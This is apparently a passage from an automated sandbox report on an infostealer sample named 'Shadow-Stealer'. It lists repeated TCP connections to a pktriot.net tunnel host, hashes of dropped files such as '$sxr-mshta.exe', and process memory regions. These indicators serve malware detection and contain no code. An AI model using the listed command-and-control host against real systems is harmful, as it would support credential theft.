| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe
| MD5 | 0e9ccd796e251916133392539572a374 |
| SHA1 | eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204 |
| SHA256 | c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221 |
| SHA512 | e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d |
memory/5052-4-0x00007FF8641C3000-0x00007FF8641C5000-memory.dmp
memory/5052-14-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uee1a3a3.oxg.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5052-5-0x000002877AC40000-0x000002877AC62000-memory.dmp
memory/5052-15-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp
memory/5052-16-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp
memory/5052-17-0x0000028700000000-0x0000028700024000-memory.dmp
memory/5052-19-0x00007FF884550000-0x00007FF88460D000-memory.dmp
memory/5052-18-0x00007FF8855C0000-0x00007FF8857C9000-memory.dmp
memory/5052-20-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp
memory/5052-21-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp
memory/5052-22-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp
memory/5052-23-0x0000028700330000-0x0000028700D80000-memory.dmp
memory/5052-25-0x0000028700D80000-0x0000028700E26000-memory.dmp
memory/5052-26-0x0000028700E30000-0x0000028700E86000-memory.dmp
memory/5052-27-0x0000028700E90000-0x0000028700EE8000-memory.dmp
memory/5052-28-0x0000028700EF0000-0x0000028700F12000-memory.dmp
memory/5052-29-0x00007FF8855C0000-0x00007FF8857C9000-memory.dmp
memory/5052-31-0x00000287011E0000-0x00000287011EA000-memory.dmp
memory/4804-32-0x0000000140000000-0x0000000140004000-memory.dmp
memory/5052-35-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp
memory/3852-36-0x0000000000400000-0x0000000000406000-memory.dmp
memory/4804-34-0x0000000140000000-0x0000000140004000-memory.dmp
memory/3852-40-0x0000000000400000-0x0000000000406000-memory.dmp
memory/5052-39-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp
C:\Windows\$sxr-mshta.exe
| MD5 | 356e04e106f6987a19938df67dea0b76 |
| SHA1 | f2fd7cde5f97427e497dfb07b7f682149dc896fb |
| SHA256 | 4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e |
| SHA512 | df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd |
memory/5052-50-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp
C:\Windows\$sxr-cmd.exe
| MD5 | c5db7b712f280c3ae4f731ad7d5ea171 |
| SHA1 | e8717ff0d40e01fd3b06de2aa5a401bed1c907cc |
| SHA256 | f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba |
| SHA512 | bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89 |
memory/3376-63-0x00007FF8855C0000-0x00007FF8857C9000-memory.dmp
memory/3376-64-0x00007FF884550000-0x00007FF88460D000-memory.dmp
memory/3376-65-0x000001C72C3F0000-0x000001C72C976000-memory.dmp
memory/3376-66-0x000001C734A50000-0x000001C73521A000-memory.dmp
memory/3376-67-0x000001C735220000-0x000001C73565E000-memory.dmp
memory/3376-68-0x000001C735660000-0x000001C735712000-memory.dmp
memory/3376-69-0x00007FF8855C0000-0x00007FF8857C9000-memory.dmp
memory/5052-75-0x00007FF8641C3000-0x00007FF8641C5000-memory.dmp
memory/3376-78-0x000001C72D2F0000-0x000001C72D340000-memory.dmp
memory/3376-79-0x000001C72D400000-0x000001C72D4B2000-memory.dmp
memory/3376-80-0x000001C72D690000-0x000001C72D852000-memory.dmp
memory/3376-89-0x000001C72D340000-0x000001C72D37C000-memory.dmp
memory/3376-90-0x000001C72D2A0000-0x000001C72D2EE000-memory.dmp
memory/3376-91-0x00007FF8855C0000-0x00007FF8857C9000-memory.dmp
memory/5052-92-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp
memory/3376-93-0x00007FF884550000-0x00007FF88460D000-memory.dmp
memory/3376-94-0x000001C72D380000-0x000001C72D3B6000-memory.dmp
memory/4656-95-0x0000000140000000-0x0000000140028000-memory.dmp
memory/4656-98-0x00007FF884550000-0x00007FF88460D000-memory.dmp
memory/4656-97-0x00007FF8855C0000-0x00007FF8857C9000-memory.dmp
memory/4656-96-0x0000000140000000-0x0000000140028000-memory.dmp
memory/608-102-0x0000028B30050000-0x0000028B30077000-memory.dmp
memory/980-114-0x00000143C5B10000-0x00000143C5B37000-memory.dmp
memory/980-115-0x00007FF845650000-0x00007FF845660000-memory.dmp
memory/976-128-0x000002CF9FB00000-0x000002CF9FB27000-memory.dmp
memory/1160-138-0x00007FF845650000-0x00007FF845660000-memory.dmp
memory/1160-137-0x0000023CB6AA0000-0x0000023CB6AC7000-memory.dmp
memory/1068-135-0x00007FF845650000-0x00007FF845660000-memory.dmp
memory/1068-134-0x00000268087B0000-0x00000268087D7000-memory.dmp
memory/1056-132-0x00007FF845650000-0x00007FF845660000-memory.dmp
memory/1056-131-0x000001E5698E0000-0x000001E569907000-memory.dmp
memory/976-129-0x00007FF845650000-0x00007FF845660000-memory.dmp
memory/456-119-0x00007FF845650000-0x00007FF845660000-memory.dmp
memory/456-118-0x0000019D7E9D0000-0x0000019D7E9F7000-memory.dmp
memory/696-112-0x00007FF845650000-0x00007FF845660000-memory.dmp
memory/428-110-0x00007FF845650000-0x00007FF845660000-memory.dmp
memory/428-109-0x0000020EE6940000-0x0000020EE6967000-memory.dmp
memory/608-107-0x00007FF845650000-0x00007FF845660000-memory.dmp
memory/696-104-0x00000202CE2F0000-0x00000202CE317000-memory.dmp
memory/608-101-0x0000028B2FDD0000-0x0000028B2FDF2000-memory.dmp
memory/4656-99-0x0000000140000000-0x0000000140028000-memory.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.3de27bd6-27d3-4e8b-8fb8-ed8767f6d008.tmp.csv
| MD5 | 7063770dc9c0bfd9224d259979ff24d0 |
| SHA1 | 996fa6a4cd8dbe3e95e22642a2d6896c5024a8f1 |
| SHA256 | 3221a00201b27de4df7a6156b6c9d1beb8f431584f4ffcce1b010ecbb27fc738 |
| SHA512 | 75e8a4499fb9e1eeed31dfccc247d115c26887498b6ba6ad28a96c93974ab33513072805a1c6e43f19ecfc9e89283da7040a55b155fd144827b5901d3ed37481 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.6f8a75da-a379-4005-81bb-d5cfc52bf66b.tmp.txt
| MD5 | 5b8b8068b70178bdd1483260e217005f |
| SHA1 | d86c188fa292eb90dbbea10dc436f08a4f4b7d7d |
| SHA256 | dbbdee25e509424692054df561c393aaae51ee8fb80b873323a15152b1b4bde7 |
| SHA512 | d54e6140a28c4575ab98be30e4290cf4defdb873214379f58c651e496c79ea94572369133945510b7d54d6e63e71c3711f4c02ef360d4212996e199fb84867dc |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.b7dc8a3a-917a-4108-aa68-babea3ea7976.tmp.csv
| MD5 | 5084e8d0b89b8deb8fe1332866c55c28 |
| SHA1 | 310daebcc4d4a1c3f596826324ca3444786f3b56 |
| SHA256 | a1ab8d1104743938c60543f0d869ba6810a0918f39f2ff75b61791ecb9e33429 |
| SHA512 | fa21f03f09d6095ab1d60907c56f2a8025931df311c2fabfa631d2c348b3fa9d66e5c5e17b7d1f5ee09d464d415dd8d949a79db10da47d9df61418f4ea67b589 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.b887b74b-fc56-4986-9735-6b2e57235bca.tmp.txt
| MD5 | 48a532728c1b15dc689bc65579f7117d |
| SHA1 | 2b8ed745721c0152553a6a9a6d7d2df023dd605b |
| SHA256 | 8a79d5b5dfd9cc891678e5fd58f229dc3aadaceec769d435dc1ca3dc1611764b |
| SHA512 | bb2141c3966062351b85406d45845039a7c292efcf7617e5e35ebffde2b705bb6c1005920326b26ba22b57115ecd387d0c2e2cf682b1e0c8af87f966fd68c245 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.ada51214-6507-4896-8df6-667eb1b78be9.tmp.csv
| MD5 | 01cb1d4788f45c401ab79452e5ba54c8 |
| SHA1 | f5044f4415229350f313551c3d8221a7775e5767 |
| SHA256 | 5225483c288be5934f80e3da246bc20f49b8b85e87fd74d1e9e6c6fb229ecd2a |
| SHA512 | 1059a6e3a10dfa77ecf8cea94734f6787adca0a3ef9663c620029047ea8a52d32114a7d98057e875dc711d15e0da577e4efbf76eb8d0ac78a1fea40a16d0232f |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.bb5d6639-1f2b-4ff2-b97d-0a444c98fe71.tmp.txt
| MD5 | 068d45478c1a2de352808afef100814e |
| SHA1 | b41065c9ffe1cb525da16aa856c2cfaafce2d82f |
| SHA256 | 9947084d90b2627cd48ea3552cb24943dfacb1d54f72cde8724b0ac2fabd93bc |
| SHA512 | f81bea8eb91462e1ca1298380cfdd9c446580c60b76b91bb86798d79c533548fc305378060e3d43e09dfcc1223b175d225f551163d026e67c61cbfa08675a403 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.96a06089-492f-42f6-b935-86a105cb6905.tmp.csv
| MD5 | 95cb02d483fe046902d3b478920a5658 |
| SHA1 | a9a08b5aa0fe9d8e37d38d251df3b61cbeed027f |
| SHA256 | 0217b3642b98ee92d4947c252a6460b5a69723872819f2b553149e2035133f5b |
| SHA512 | 7c627629cf83d85b76f6fe9e2cd968dd1795627d81a6bb22fa451db63d40caa5d77533432313eaa65def4aa1b21756b53d3f8cf02e35c18e1eec9b1e1dcf7404 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.6bc79591-81e3-462e-9757-2417cf610904.tmp.txt
| MD5 | 13ef68fb4e61d63143470b36786c4484 |
| SHA1 | 00007ae99e2ae4bf7e4e1fb15a7927d42c1b5fce |
| SHA256 | 1e1e523890db643d90d9beb9bd555c9e58569c4f4a5329d2c3170e5a6587ec11 |
| SHA512 | 52f81da16f8267940caf756eb2f6978a2984311a3e5e8fc70050b72d6ab81e018c78f567e507cfed1c8338efeb0df71938146ac0ed33751b2850888fdcc266f3 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.13525c67-d246-49b1-9cc9-aaea80c983f7.tmp.csv
| MD5 | 120dfd230113d7564374f16309415b42 |
| SHA1 | 43a47aad948a8439c582fe61b7aa90595254870c |
| SHA256 | b2efe62d0970e670457d53676caee2888956ebaa66450fac9d45a2e4301b4bde |
| SHA512 | 6bd90034fdcdaf9b6f738c1bc72e1639affb8f595194263f318366d36c2019fd32000afe6bb407e25fc4718bc099efcff1ab4bd431f712dff498cee7f0033d44 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.d196a0d9-62fe-4327-b08f-bb9ff5b1ec9b.tmp.txt
| MD5 | 4d5b955f5cd01bc211f1a5171b206ada |
| SHA1 | b22825b3ec9c7e68801fad0bc4ee8e351446c95c |
| SHA256 | e53e8975b34fc62b24856588b1642cef8db319125bdb05b6c5793b11516379c6 |
| SHA512 | 6b8330d266ce448a955283a5736f1eb9f6c5065d9b76e4b38500af9a38723745fc887f7b60270a68cd4fcd28468f4872076f7bd19b5eb924a64c14394f8b67b0 |
memory/5052-1533-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
| MD5 | cb9ee6118f51a0a5430cca6cbc4e2df8 |
| SHA1 | 231c6223dee2094738bd65210e56dddfde19ebf9 |
| SHA256 | 7e134f47993f776d4000d86c6940491bf682735097997d3df713592a83267404 |
| SHA512 | 5fb227f526c6d93e55e0e7e504d1336d6ed5ec60f62d18771c2d3970bd25f3a0c4f5619162d33a66f1495850a6f16bff0deabf9f2752053fc84cca16312349d6 |
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
| MD5 | 713235d54dfa7cc46c168aff278a35e5 |
| SHA1 | 8a2420651da8dfb4f3a2fc2d74a0174813709ecd |
| SHA256 | af8df51b7bb0977ed751957cdbc25e4bd55ebe37f3382cd94246dff58a0ce0e1 |
| SHA512 | 359d3ed14ad983dca7c1645540f62ef809620d7518e27bca731fb2946c3658601b8ed7c73952c985cda6a8516434cb920094ba27120731c759b7c8d15b6b5154 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.73d7450b-e12d-4fe1-b79d-4b898a10ab60.tmp.csv
| MD5 | 3a3667a8167841dd05fd5659a3f792fc |
| SHA1 | 2f10890642fd8967216030118f71878ba354a85b |
| SHA256 | f6aeedfacb6337bc5385697d671879fcb041743cec6d334c254f38c3957688c0 |
| SHA512 | 08ae11df864fc5dcf531483ba622f6b67f88ac90b3bdc58d5dfadbbe681f14edd745c1b09c5a42780763c16ddb41c45379512c23a50d504e2a38f31201fd098c |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.2b635f1f-dbf4-4168-933a-a601aed43ea3.tmp.txt
| MD5 | b9bc230d8f68396be986edde3b3c121a |
| SHA1 | 3ca9e4ce80a10d44561ca568c2ab00125258e68d |
| SHA256 | 16f93c086e7e5801ec888eb096660d80199c143869548ac5d73af5121836a92d |
| SHA512 | 191811eb896cc8a8a926935616040a8a35aabb7c269ee4625a00a81193f66e92e9439e05032cedb2be76eef773a3e11fb3e894870899bb05f432c5d30b5693f3 |